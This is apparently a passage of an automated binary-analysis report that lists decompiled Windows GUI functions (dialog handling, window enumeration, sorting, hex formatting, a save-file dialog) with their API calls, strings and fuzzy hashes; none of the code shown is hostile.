Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharFileMultiWideWritememsetstrlen
String ID:
API String ID: 2754987064-0
Opcode ID: d28ee54518f084822013d34342f346ed231f2bd2b05664fcb46c1bfc8e962716
Instruction ID: 1e840beb1bf30e5fccbc8f780a259ac9f9e503c3acfa46e2f16182fe3cbfa9d3
Opcode Fuzzy Hash: d28ee54518f084822013d34342f346ed231f2bd2b05664fcb46c1bfc8e962716
Instruction Fuzzy Hash: 5AF06DB340022CBEEB159B95DDC8DEB776CDB08254F0005B6B705E2082D674AE488B78

Uniqueness

Uniqueness Score: -1.00%

Function 0040D4A5, Relevance: 6.0, APIs: 4, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E0040D4A5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				void* __esi;
				void* _t11;
				void* _t26;
				void* _t27;

				_t26 = __edx;
				_t11 = _a4 - 0x110;
				_t27 = __ecx;
				if(_t11 == 0) {
					E0040D12C(__ecx, __ecx, __eflags);
					E00405B17(_t26,  *((intOrPtr*)(__ecx + 0x10)), 4);
					L5:
					return E004015CE(_t27, _a4, _a8, _a12);
				}
				if(_t11 != 0x28 || E00405954(_a12) == 0) {
					goto L5;
				} else {
					SetBkMode(_a8, 1);
					SetBkColor(_a8, 0xffffff);
					SetTextColor(_a8, 0xc00000);
					return GetStockObject(0);
				}
			}

0x0040d4a5
0x0040d4ab
0x0040d4b1
0x0040d4b3
0x0040d4f8
0x0040d502
0x0040d509
0x00000000
0x0040d514
0x0040d4b8
0x00000000
0x0040d4c7
0x0040d4cc
0x0040d4da
0x0040d4e8
0x00000000
0x0040d4f0

APIs

Part of subcall function 00405954: memset.MSVCRT ref: 00405973
Part of subcall function 00405954: GetClassNameW.USER32 ref: 0040598A
Part of subcall function 00405954: _wcsicmp.MSVCRT ref: 0040599C

SetBkMode.GDI32(?,00000001), ref: 0040D4CC
SetBkColor.GDI32(?,00FFFFFF), ref: 0040D4DA
SetTextColor.GDI32(?,00C00000), ref: 0040D4E8
GetStockObject.GDI32(00000000), ref: 0040D4F0

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
String ID:
API String ID: 764393265-0
Opcode ID: ca25dde08b06af05e87ec273bb2285fb02c39f0e3788d2d6ffb738d57894f22f
Instruction ID: 94e493e720f5362771ebb13374b41de4394e2b92cb987e20627275f4cfdde941
Opcode Fuzzy Hash: ca25dde08b06af05e87ec273bb2285fb02c39f0e3788d2d6ffb738d57894f22f
Instruction Fuzzy Hash: 8BF08132100204BBDF212FA4DD06A9A3F65EF04724F108136FA14B95F2CB75A9689E48

Uniqueness

Uniqueness Score: -1.00%

Function 00401482, Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401482() {
				intOrPtr _t14;
				struct HWND__* _t17;
				intOrPtr _t25;
				void* _t26;

				if( *0x412394 == 2) {
					ExitProcess(1);
				}
				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
				_t25 =  *((intOrPtr*)(_t26 + 8));
				if( *(_t26 + 0xc) == 0x110) {
					_t17 =  *(_t25 + 0x10);
					 *(_t26 + 0xc) = _t17;
					if( *0x412ecc != 0) {
						EnumChildWindows(_t17, E00406B34, 2);
						EnumChildWindows( *(_t26 + 0xc), E00406B34, 1);
						E00405D0F( *(_t26 + 0xc), 0x400000);
					}
				}
				if( *((intOrPtr*)(_t25 + 8)) != 0) {
					SetWindowLongW( *(_t25 + 0x10), 0,  *(_t25 + 0xc));
				}
				_t14 =  *((intOrPtr*)(_t26 - 0x1c));
				return E0040E2F1(_t14);
			}

0x0040148c
0x00401490
0x00401490
0x00401496
0x0040149a
0x004014a4
0x004014a6
0x004014a9
0x004014b3
0x004014c4
0x004014cc
0x004014d6
0x004014dc
0x004014b3
0x004014e1
0x004014eb
0x004014eb
0x004014f1
0x004014fd

APIs

ExitProcess.KERNEL32 ref: 00401490
EnumChildWindows.USER32 ref: 004014C4
EnumChildWindows.USER32 ref: 004014CC
SetWindowLongW.USER32 ref: 004014EB

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: ChildEnumWindows$ExitLongProcessWindow
String ID:
API String ID: 2626381504-0
Opcode ID: d8aa7df9834c5b75a80874de14757cc8ee2dad9e22ca44b4b42e3173c3f6ee89
Instruction ID: e2987c10faa884b4915a7f97f1375000f64f28bf07688916d28e14d934a6fd2a
Opcode Fuzzy Hash: d8aa7df9834c5b75a80874de14757cc8ee2dad9e22ca44b4b42e3173c3f6ee89
Instruction Fuzzy Hash: 15011A30500209EFDB249F55ED0AB9A37A1EB00324F20C579F9657A5F0C7B96854DF18

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3B4, Relevance: 6.0, APIs: 4, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C3B4(void** __eax, struct HWND__* _a4) {
				int _t7;
				void** _t11;

				_t11 = __eax;
				if( *0x413258 == 0) {
					memcpy(0x412668,  *__eax, 0x50);
					memcpy(0x412398,  *(_t11 + 4), 0x2cc);
					 *0x413258 = 1;
					_t7 = DialogBoxParamW(GetModuleHandleW(0), 0x6b, _a4, E0040C0C7, 0);
					 *0x413258 =  *0x413258 & 0x00000000;
					 *0x412394 = _t7;
					return 1;
				} else {
					return 1;
				}
			}

0x0040c3bc
0x0040c3be
0x0040c3ce
0x0040c3e0
0x0040c3ed
0x0040c407
0x0040c40d
0x0040c414
0x0040c41c
0x0040c3c0
0x0040c3c4
0x0040c3c4

APIs

memcpy.MSVCRT ref: 0040C3CE
memcpy.MSVCRT ref: 0040C3E0
GetModuleHandleW.KERNEL32(00000000), ref: 0040C3F3
DialogBoxParamW.USER32 ref: 0040C407

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: memcpy$DialogHandleModuleParam
String ID:
API String ID: 1386444988-0
Opcode ID: d000923bd1a2c8bc84f0207edb9b446423912ab7819a2e97a848d13e141c1bba
Instruction ID: 89add42b0ad0b7d68bf63fa0eb6c53c6f7d1aed99d4242a64f88595bbbc02ed0
Opcode Fuzzy Hash: d000923bd1a2c8bc84f0207edb9b446423912ab7819a2e97a848d13e141c1bba
Instruction Fuzzy Hash: 3EF08232650360FBE7207FA4AD46BDA7A90E744B12F20457AF644F50E1C2F915658B8C

Uniqueness

Uniqueness Score: -1.00%

Function 00401712, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401712(struct HWND__* __eax, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				struct HWND__* _t11;
				struct HWND__* _t12;
				struct HWND__* _t13;
				void* _t16;

				_t16 = __edi;
				_t12 = __eax;
				 *((intOrPtr*)(__edi + 0x10)) = __eax;
				GetClientRect(__eax, __edi + 0x24);
				E00403F55(__edi + 0x14);
				_t13 = GetWindow(GetWindow(_t12, 5), 0);
				while(1) {
					E0040169B(_t9, _t16);
					_t11 = GetWindow(_t13, 2);
					_t13 = _t11;
					if(_t13 == 0) {
						break;
					}
					_t9 = _t13;
				}
				return _t11;
			}

0x00401712
0x00401713
0x0040171b
0x0040171e
0x00401727
0x0040173c
0x00401742
0x00401744
0x0040174c
0x0040174e
0x00401752
0x00000000
0x00000000
0x00401740
0x00401740
0x00401756

APIs

GetClientRect.USER32 ref: 0040171E

Part of subcall function 00403F55: free.MSVCRT(00000000,0040BC79,?,00000000,0040C0A1,/deleteregkey,/savelangfile,?,?,?,?,00000002,?,0040E23C,00000000), ref: 00403F5C

GetWindow.USER32(?,00000005), ref: 00401737
GetWindow.USER32(00000000), ref: 0040173A

Part of subcall function 0040169B: GetWindowRect.USER32 ref: 004016AD
Part of subcall function 0040169B: MapWindowPoints.USER32 ref: 004016BE
Part of subcall function 0040169B: free.MSVCRT(?,?,?), ref: 004016DB

GetWindow.USER32(00000000,00000002), ref: 0040174C

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rectfree$ClientPoints
String ID:
API String ID: 3078297017-0
Opcode ID: 3a4aa1592c158fe3daa17fad5146983a8383157a6360d7d68cc82a07b6ab73eb
Instruction ID: 3c878aa69d1487aa6e46661a708a7683238dcb4edfadfd8cd86f08b3a4e73e8d
Opcode Fuzzy Hash: 3a4aa1592c158fe3daa17fad5146983a8383157a6360d7d68cc82a07b6ab73eb
Instruction Fuzzy Hash: D7E0EDA170071667D6106BB59DC5A6666ACBB08341F000436B60AF7592DBB8AD148BA8

Uniqueness

Uniqueness Score: -1.00%

Function 0040B31A, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040B31A(char* __ecx, void* __edx, short _a4, short _a8) {
				char _v518;
				char _v1028;
				char _v1092;
				signed int _v1100;
				char _v1172;
				char* _v1176;
				intOrPtr _v1184;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t74;
				void* _t93;
				intOrPtr _t113;
				void* _t114;
				char* _t116;
				intOrPtr _t132;

				_t114 = __edx;
				_t112 = __ecx;
				_push(_t108);
				_t116 = __ecx;
				_v1176 = __ecx;
				if(_a4 == 0 || _a4 == 1) {
					_t142 = _a8 - 0x9c62;
					if(_a8 == 0x9c62) {
						_t108 = _t116;
						_t74 = E0040AD95(_t116, _t142);
					}
					_t143 = _a8 - 0x9c5f;
					if(_a8 == 0x9c5f) {
						_t74 = E0040AE4D(_t74, _t112, _t114, _t116, _t143);
					}
					if(_a8 == 0x9c5e) {
						 *( *((intOrPtr*)(_t116 + 0x698)) + 0x10) =  *( *((intOrPtr*)(_t116 + 0x698)) + 0x10) ^ 0x00000001;
						_t108 = 0;
						E0040A1DC(0, _t112, _t116, 0);
						_t74 = E004080C5( *((intOrPtr*)(_t116 + 0x69c)), _t112);
					}
					if(_a8 == 0x9c5c) {
						 *( *((intOrPtr*)(_t116 + 0x698)) + 0xc) =  *( *((intOrPtr*)(_t116 + 0x698)) + 0xc) ^ 0x00000001;
						_t108 = 0;
						E0040A1DC(0, _t112, _t116, 0);
						E0040A3BF(_t116);
						_t74 = InvalidateRect( *( *((intOrPtr*)(_t116 + 0x69c)) + 0x2ac), 0, 0);
					}
					if(_a8 == 0x9c42) {
						_t74 = DestroyWindow( *(_t116 + 0x208));
					}
					if(_a8 == 0x9c49) {
						_t108 = _t116;
						_t74 = E0040B0C2(_t116);
					}
					if(_a8 == 0x9c56) {
						 *( *((intOrPtr*)(_t116 + 0x698)) + 8) =  *( *((intOrPtr*)(_t116 + 0x698)) + 8) ^ 0x00000001;
						_t108 = 0;
						E0040A1DC(0, _t112, _t116, 0);
						_t74 = E0040A6FF(_t116);
					}
					if(_a8 == 0x9c44) {
						_t74 = E00401BDC(_t116, 0x415);
					}
					if(_a8 == 0x9c43) {
						E0040133A( &_v1092);
						_v1092 = 0x410428;
						E00401000( &_v1028, _t112, 0x412290);
						_t108 =  &_v518;
						E00401000( &_v518, _t112, 0x4122c4);
						_t132 = _v1176;
						_push( *((intOrPtr*)(_t132 + 0x208)));
						_push( &_v1092);
						_t93 = 0x70;
						E0040152F(_t93);
						E004077CB( *((intOrPtr*)(_t132 + 0x69c)));
						_t74 = E00401357( &_v1100);
						_t116 = _t132;
					}
					_t154 = _a8 - 0x9c41;
					if(_a8 == 0x9c41) {
						_t74 = E0040AF7D(_t112, _t114, _t116, _t154);
					}
					if(_a8 != 0x9c47) {
						L27:
						__eflags = _a8 - 0x9c4f;
						if(_a8 != 0x9c4f) {
							L31:
							__eflags = _a8 - 0x9c48;
							if(__eflags == 0) {
								_t74 = E0040AF02(_t108, _t114, _t116, _t116, __eflags);
							}
							__eflags = _a8 - 0x9c45;
							if(_a8 == 0x9c45) {
								 *( *((intOrPtr*)(_t116 + 0x698)) + 4) =  *( *((intOrPtr*)(_t116 + 0x698)) + 4) ^ 0x00000001;
								__eflags = 0;
								E0040A1DC(0, _t112, _t116, 0);
								_t74 = E0040A6FF(_t116);
							}
							__eflags = _a8 - 0x9c46;
							if(__eflags == 0) {
								_t74 = E0040B21F(_t112, _t114, _t116, __eflags, 0);
							}
							__eflags = _a8 - 0x9c4a;
							if(__eflags == 0) {
								_t74 = E0040B21F(_t112, _t114, _t116, __eflags, 1);
							}
							__eflags = _a8 - 0x9c65;
							if(__eflags == 0) {
								_t74 = E0040B054(_t116, __eflags);
							}
							__eflags = _a8 - 0x9c4b;
							if(_a8 == 0x9c4b) {
								E0040133A( &_v1172);
								_v1100 = _v1100 & 0x00000000;
								_v1172 = 0x40f7a8;
								E00403584( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x69c)) + 0x2e4)),  &_v1172,  *(_t116 + 0x208),  *( *((intOrPtr*)(_t116 + 0x69c)) + 0x2ac));
								_t82 = _v1184;
								_t113 =  *((intOrPtr*)(_v1184 + 0x698));
								__eflags =  *((intOrPtr*)(_t113 + 0x224));
								if( *((intOrPtr*)(_t113 + 0x224)) != 0) {
									__eflags =  *((intOrPtr*)(_t113 + 0x2228)) - 2;
									if( *((intOrPtr*)(_t113 + 0x2228)) == 2) {
										E0040B00A(_t82);
									}
								}
								_v1172 = 0x40f7a8;
								_t74 = E00401357( &_v1172);
								_t116 = _v1176;
							}
							__eflags = _a8 - 0x9c4c;
							if(_a8 == 0x9c4c) {
								_t74 = E00407E76( *((intOrPtr*)(_t116 + 0x69c)));
							}
							__eflags = _a8 - 0x9c58;
							if(_a8 == 0x9c58) {
								_t74 = E00407EBC( *((intOrPtr*)(_t116 + 0x69c)));
							}
							__eflags = _a8 - 0x9c4e;
							if(_a8 == 0x9c4e) {
								_t74 = E004097F2( *(_t116 + 0x208),  *((intOrPtr*)(_t116 + 0x69c)));
							}
							goto L52;
						}
						_t88 =  *((intOrPtr*)(_t116 + 0x69c));
						__eflags =  *((intOrPtr*)(_t88 + 0x2e8));
						if( *((intOrPtr*)(_t88 + 0x2e8)) == 0) {
							_t74 = E004077D8(_t88, 0xffffffff, 0, 2);
							goto L31;
						}
						_push(0xf000);
						_push(0x1000);
						goto L25;
					} else {
						_t88 =  *((intOrPtr*)(_t116 + 0x69c));
						if( *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x69c)) + 0x2e8)) == 0) {
							_t74 = E004077D8(_t88, 0xffffffff, 2, 2);
							goto L27;
						}
						_push(0xf000);
						_push(0x2000);
						L25:
						_push(0xffffffff);
						_t74 = E004077D8(_t88);
						goto L52;
					}
				} else {
					L52:
					return _t74;
				}
			}

0x0040b31a
0x0040b31a
0x0040b32b
0x0040b32e
0x0040b330
0x0040b334
0x0040b341
0x0040b347
0x0040b349
0x0040b34b
0x0040b34b
0x0040b350
0x0040b356
0x0040b35a
0x0040b35a
0x0040b365
0x0040b36d
0x0040b371
0x0040b375
0x0040b380
0x0040b380
0x0040b38b
0x0040b393
0x0040b397
0x0040b39b
0x0040b3a0
0x0040b3b3
0x0040b3b3
0x0040b3bf
0x0040b3c7
0x0040b3c7
0x0040b3d3
0x0040b3d5
0x0040b3d7
0x0040b3d7
0x0040b3e2
0x0040b3ea
0x0040b3ee
0x0040b3f2
0x0040b3f7
0x0040b3f7
0x0040b402
0x0040b40b
0x0040b40b
0x0040b416
0x0040b41c
0x0040b42d
0x0040b435
0x0040b43a
0x0040b446
0x0040b44b
0x0040b44f
0x0040b459
0x0040b45c
0x0040b45d
0x0040b468
0x0040b471
0x0040b476
0x0040b476
0x0040b478
0x0040b47e
0x0040b482
0x0040b482
0x0040b48d
0x0040b4bf
0x0040b4bf
0x0040b4c5
0x0040b4ed
0x0040b4ed
0x0040b4f3
0x0040b4f7
0x0040b4f7
0x0040b4fc
0x0040b502
0x0040b50a
0x0040b50e
0x0040b512
0x0040b517
0x0040b517
0x0040b51c
0x0040b522
0x0040b528
0x0040b528
0x0040b52d
0x0040b533
0x0040b539
0x0040b539
0x0040b53e
0x0040b544
0x0040b548
0x0040b548
0x0040b54d
0x0040b553
0x0040b559
0x0040b564
0x0040b56e
0x0040b588
0x0040b58d
0x0040b591
0x0040b597
0x0040b59e
0x0040b5a0
0x0040b5a7
0x0040b5a9
0x0040b5a9
0x0040b5a7
0x0040b5b2
0x0040b5b6
0x0040b5bb
0x0040b5bb
0x0040b5bf
0x0040b5c5
0x0040b5cd
0x0040b5cd
0x0040b5d2
0x0040b5d8
0x0040b5e0
0x0040b5e0
0x0040b5e5
0x0040b5eb
0x0040b5f9
0x0040b5f9
0x00000000
0x0040b5eb
0x0040b4c7
0x0040b4cd
0x0040b4d4
0x0040b4e8
0x00000000
0x0040b4e8
0x0040b4d6
0x0040b4db
0x00000000
0x0040b48f
0x0040b48f
0x0040b49c
0x0040b4ba
0x00000000
0x0040b4ba
0x0040b49e
0x0040b4a3
0x0040b4a8
0x0040b4a8
0x0040b4aa
0x00000000
0x0040b4aa
0x0040b5fe
0x0040b5fe
0x0040b604
0x0040b604

APIs

InvalidateRect.USER32(?,00000000,00000000), ref: 0040B3B3
DestroyWindow.USER32(?), ref: 0040B3C7

Strings

33@, xrefs: 0040B569

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: DestroyInvalidateRectWindow
String ID: 33@
API String ID: 724544332-1541121659
Opcode ID: 7ad5f6ad311df91c89693e5a2d2bb114cf057b36f9e353a504ef30fe770d82e2
Instruction ID: f9cdce4f37102d27210f5083c80b5f01578b93f7cfdd6efd8ac2da961f31085b
Opcode Fuzzy Hash: 7ad5f6ad311df91c89693e5a2d2bb114cf057b36f9e353a504ef30fe770d82e2
Instruction Fuzzy Hash: 35714630600205AACB24BF16C845A5DB3A5EB40338F14C57AF4686B6E1D77D9D958BCE

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040A4C2(void* __eax) {
				void* __ebx;
				void* __edi;
				short* __esi;
				void* _t24;
				int _t27;
				void* _t36;
				intOrPtr* _t43;

				_t36 = __eax;
				if( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x6c0)) + 0x30)) <= 0) {
					L11:
					E0040528C();
					 *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x69c)) + 0x3c)) = 0;
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t36 + 0x69c)))) + 0x68))();
					_t24 = E004065C4( *((intOrPtr*)(_t36 + 0x6c0)), L"/nosort");
					__eflags = _t24 - 0xffffffff;
					if(_t24 != 0xffffffff) {
						L15:
						goto L1;
					}
					__eflags =  *0x4131d4; // 0x1
					_t43 =  *((intOrPtr*)(_t36 + 0x69c));
					if(__eflags == 0) {
						 *0x4131d8 =  *((intOrPtr*)(_t43 + 0x2d8));
						 *0x4131d4 = 1;
					}
					_t27 =  *((intOrPtr*)( *_t43 + 0x6c))();
					qsort(E00407588(_t43, 0),  *(_t43 + 0x3c), _t27, E00409EA2);
					goto L15;
				} else {
					do {
						__ecx = __esi;
						__eax = E004065EE(__eax, __esi, L"/sort");
						__eflags = __eax;
						if(__eax != 0) {
							__eax =  *((intOrPtr*)(__edi + 0x6c0));
							_t4 = __esi + 1; // 0x1
							__ecx = _t4;
							__eflags = __ecx -  *((intOrPtr*)(__eax + 0x30));
							if(__ecx >=  *((intOrPtr*)(__eax + 0x30))) {
								__ecx = 0x40f454;
							} else {
								__ecx = __eax;
							}
							__eflags =  *__ecx - 0x7e;
							__eax =  *((intOrPtr*)(__edi + 0x69c));
							if(__eflags != 0) {
							} else {
								_push(1);
								__ecx = __ecx + 2;
							}
							_push(__ecx);
							__eax = E0040A084(__eax, __eflags);
						}
						__eax =  *((intOrPtr*)(__edi + 0x6c0));
						__esi = __esi + 1;
						__eflags = __esi -  *((intOrPtr*)(__eax + 0x30));
					} while (__esi <  *((intOrPtr*)(__eax + 0x30)));
					goto L11;
				}
				L1:
				return SetCursor( *0x412390);
			}

0x0040a4c5
0x0040a4d4
0x0040a528
0x0040a528
0x0040a533
0x0040a53e
0x0040a54c
0x0040a551
0x0040a554
0x0040a599
0x00000000
0x0040a59b
0x0040a556
0x0040a55c
0x0040a562
0x0040a56a
0x0040a56f
0x0040a56f
0x0040a585
0x0040a591
0x00000000
0x0040a4d6
0x0040a4d6
0x0040a4db
0x0040a4dd
0x0040a4e2
0x0040a4e4
0x0040a4e6
0x0040a4ec
0x0040a4ec
0x0040a4ef
0x0040a4f2
0x0040a4fd
0x0040a4f4
0x0040a4f9
0x0040a4f9
0x0040a502
0x0040a506
0x0040a50c
0x0040a50e
0x0040a50e
0x0040a510
0x0040a510
0x0040a516
0x0040a517
0x0040a517
0x0040a51c
0x0040a522
0x0040a523
0x0040a523
0x00000000
0x0040a4d6
0x004052a6
0x004052b2

APIs

qsort.MSVCRT ref: 0040A591

Part of subcall function 004065EE: _wcsicmp.MSVCRT ref: 00406604

Strings

/nosort, xrefs: 0040A547
/sort, xrefs: 0040A4D6

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsicmpqsort
String ID: /nosort$/sort
API String ID: 1579243037-1578091866
Opcode ID: 124884d5dc6559089fffaca0d7121966e37f59272275963d4074e0ad8fb9bc0b
Instruction ID: 6b5ec6eb7515bc088160010cb6f8a328b32efe940b1a3fb6a30810c5b3da645c
Opcode Fuzzy Hash: 124884d5dc6559089fffaca0d7121966e37f59272275963d4074e0ad8fb9bc0b
Instruction Fuzzy Hash: 8821D370600600FFC714EF26C885DA6B3A5FB44328B01017EE915BB6E1C779BC608B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00405E81, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00405E81(intOrPtr _a4, intOrPtr _a8, void* _a12) {
				void* _v8;
				void* _v26;
				void _v28;
				void* _t24;
				void* _t25;
				void* _t35;
				signed int _t38;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t24 = _a12;
				_t45 = _t44 - 0x18;
				_t42 = 0;
				 *_t24 = 0;
				if(_a8 <= 0) {
					_t25 = 0;
				} else {
					_t38 = 0;
					_t35 = 0;
					if(_a8 > 0) {
						_v8 = _t24;
						while(1) {
							_v28 = _v28 & 0x00000000;
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosw");
							_push( *(_t35 + _a4) & 0x000000ff);
							_push(L"%2.2X ");
							_push(0xa);
							_push( &_v28);
							L0040DFD6();
							_t38 = _t42;
							memcpy(_v8,  &_v28, 6);
							_t13 = _t42 + 3; // 0x3
							_t45 = _t45 + 0x1c;
							if(_t13 >= 0x2000) {
								break;
							}
							_v8 = _v8 + 6;
							_t35 = _t35 + 1;
							_t42 = _t42 + 3;
							if(_t35 < _a8) {
								continue;
							}
							break;
						}
						_t24 = _a12;
					}
					 *(_t24 + 4 + _t38 * 2) =  *(_t24 + 4 + _t38 * 2) & 0x00000000;
					_t25 = 1;
				}
				return _t25;
			}

0x00405e84
0x00405e87
0x00405e8b
0x00405e90
0x00405e93
0x00405f05
0x00405e95
0x00405e97
0x00405e99
0x00405e9e
0x00405ea0
0x00405ea3
0x00405ea3
0x00405ead
0x00405eae
0x00405eaf
0x00405eb0
0x00405eb1
0x00405eba
0x00405ebb
0x00405ec3
0x00405ec5
0x00405ec6
0x00405ed4
0x00405ed6
0x00405edb
0x00405ede
0x00405ee6
0x00000000
0x00000000
0x00405ee8
0x00405eec
0x00405eed
0x00405ef3
0x00000000
0x00000000
0x00000000
0x00405ef3
0x00405ef5
0x00405ef5
0x00405ef8
0x00405f01
0x00405f02
0x00405f09

APIs

_snwprintf.MSVCRT ref: 00405EC6
memcpy.MSVCRT ref: 00405ED6

Strings

%2.2X , xrefs: 00405EBB

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfmemcpy
String ID: %2.2X
API String ID: 2789212964-323797159
Opcode ID: 5646eba8dd4affce10f05f382f775d9093a619cdef628270f3a0be2943da427e
Instruction ID: 09870db8f10325833ee0949f0b54b8ee796ec7cfb255f8a941d73aa4e244bb5d
Opcode Fuzzy Hash: 5646eba8dd4affce10f05f382f775d9093a619cdef628270f3a0be2943da427e
Instruction Fuzzy Hash: 33118232904609BFDB10DFE8C8869AF73B9FB44314F108477ED11E7181E6789A158BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00405DCD, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405DCD(intOrPtr* __ebx, intOrPtr __ecx, wchar_t* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v60;
				intOrPtr _v64;
				wchar_t* _v68;
				intOrPtr _v72;
				signed int _v80;
				intOrPtr _v84;
				intOrPtr _v92;
				struct tagOFNA _v96;
				intOrPtr _t23;
				intOrPtr* _t33;
				intOrPtr _t34;
				wchar_t* _t38;

				_t38 = __edi;
				_t34 = __ecx;
				_t33 = __ebx;
				_t23 = 1;
				if(__ebx != 0) {
					_t23 =  *__ebx;
				}
				_v80 = _v80 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v52 = _v52 & 0x00000000;
				_v72 = _t23;
				_v48 = _a8;
				_v36 = _a12;
				_v92 = _t34;
				_v96 = 0x58;
				_v84 = _a4;
				_v68 = _t38;
				_v64 = 0x104;
				_v44 = 0x80806;
				if(GetSaveFileNameW( &_v96) == 0) {
					return 0;
				} else {
					if(_t33 != 0) {
						 *_t33 = _v72;
					}
					wcscpy(_t38, _v68);
					return 1;
				}
			}

0x00405dcd
0x00405dcd
0x00405dcd
0x00405dd5
0x00405dd8
0x00405dda
0x00405dda
0x00405ddc
0x00405de0
0x00405de4
0x00405de8
0x00405dee
0x00405df4
0x00405df7
0x00405e01
0x00405e08
0x00405e0b
0x00405e0e
0x00405e15
0x00405e24
0x00405e42
0x00405e26
0x00405e28
0x00405e2d
0x00405e2d
0x00405e33
0x00405e3e
0x00405e3e

APIs

GetSaveFileNameW.COMDLG32(?), ref: 00405E1C
wcscpy.MSVCRT ref: 00405E33

Strings

X, xrefs: 00405E01

Memory Dump Source

Source File: 00000001.00000002.224539761.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.224533843.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224554347.000000000040F000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.224561197.0000000000412000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.224572738.0000000000414000.00000002.00020000.sdmp Download File

Similarity

API ID: FileNameSavewcscpy
String ID: X
API String ID: 3080202770-3081909835
Opcode ID: a0857a089f4deec4c1b474bd9ffc3361d4690667bb8dbb74d33b67a2b866139b
Instruction ID: 35274199d236effe9a648b535348c56afb13a0cf633c63e6ee0ccd6430c010a7
